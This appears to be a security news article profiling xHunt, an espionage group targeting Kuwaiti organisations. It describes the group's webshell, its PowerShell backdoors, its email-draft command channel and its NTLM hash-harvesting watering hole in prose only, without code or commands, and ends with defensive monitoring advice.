xHunt, a sophisticated cyber-espionage group with a laser focus on organizations in Kuwait, has continued to demonstrate advanced capabilities in infiltrating critical infrastructure.
The group’s persistent, multi-year campaigns targeting the shipping, transportation, and government sectors underscore the evolving threat landscape facing Middle Eastern enterprises.
Since its first documented operations in July 2018, xHunt has refined its tactics with a distinctly creative approach, naming its custom-built malware after characters from the anime series “Hunter x Hunter” a quirk that inadvertently became the origin of the group’s name itself.
The group’s operational sophistication extends beyond simple malware deployment. xHunt has demonstrated exceptional adaptability in targeting web-facing infrastructure, particularly Microsoft Exchange and Internet Information Services (IIS) web servers.
In campaigns spanning 2019 to 2020, the group successfully compromised a Microsoft Exchange Server at a Kuwaiti organization.
It established persistent backdoor access through multiple channels. This attack vector proved instrumental in the group’s ability to maintain long-term presence within victim networks while remaining largely undetected.
The deployment of BumbleBee, a custom webshell designed for direct command execution, became central to xHunt’s operational playbook.
Operating through compromised web servers, BumbleBee provided attackers with reliable command and control capabilities on internal systems.
Complementing this toolset, xHunt deployed PowerShell-based backdoors notably TriFive and Snugy (a variant of CASHY200) which leveraged Windows’ built-in scripting capabilities to establish persistence and execute malicious commands without raising suspicion.
Command and Control Mechanisms
Perhaps most remarkable is xHunt’s creative approach to command and control communications.
The TriFive and Hisoka backdoors eschew traditional C2 channels in favor of a method that weaponizes Exchange Web Services (EWS).
These backdoors communicate by reading and writing email drafts within a compromised user’s mailbox, specifically utilizing the Drafts or Deleted Items folders.
Operators issue commands by creating email drafts with specific subjects and base64-encoded payloads, with responses encrypted and stored back in the mailbox.
Once established within a network, xHunt employs SSH tunneling through PuTTY Link (Plink) to create encrypted tunnels toward internal resources.
This technique effectively uses legitimate email infrastructure to mask malicious communications, making detection significantly more challenging.
xHunt’s initial access strategy demonstrates patient, methodical planning. In one notable watering hole operation, the group compromised a Kuwaiti government website and injected a hidden HTML image tag that triggered passive NTLM hash harvesting.
By leveraging the file:// URI scheme to reference an actor-controlled SMB share, the attack automatically captured authentication credentials from visiting users without their knowledge.
This technique highlights the group’s understanding of Windows authentication mechanisms and their ability to exploit them for reconnaissance purposes.
The group has demonstrated particular interest in accessing Remote Desktop Protocol services and internal IIS servers, suggesting a methodical approach to lateral movement and privilege escalation within compromised environments.
Security and Attribution Obfuscation
The group’s infrastructure protection tactics reveal operational maturity.
When directly accessing webshells on internet-exposed Exchange servers, xHunt routes traffic through Private Internet Access VPN services while continuously rotating between servers located across multiple European countries Belgium, Germany, Ireland, Italy, Luxembourg, the Netherlands, Poland, Portugal, Sweden, and the United Kingdom.
This deliberate obfuscation strategy complicates attribution and forensic analysis, effectively masking the group’s true operational origin.
The sustained focus on Kuwaiti organizations across shipping, transportation, and government sectors suggests xHunt operates with specific strategic objectives rather than pursuing opportunistic financial gain.
The sophistication of their tooling, the persistence of their campaigns, and the creativity of their operational security measures indicate state-sponsored or well-resourced threat activity.
Organizations in the Gulf region should prioritize enhanced monitoring of web server access logs, email system activity, and PowerShell execution, while implementing robust credential management practices to mitigate the risk of compromise by this determined adversary.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.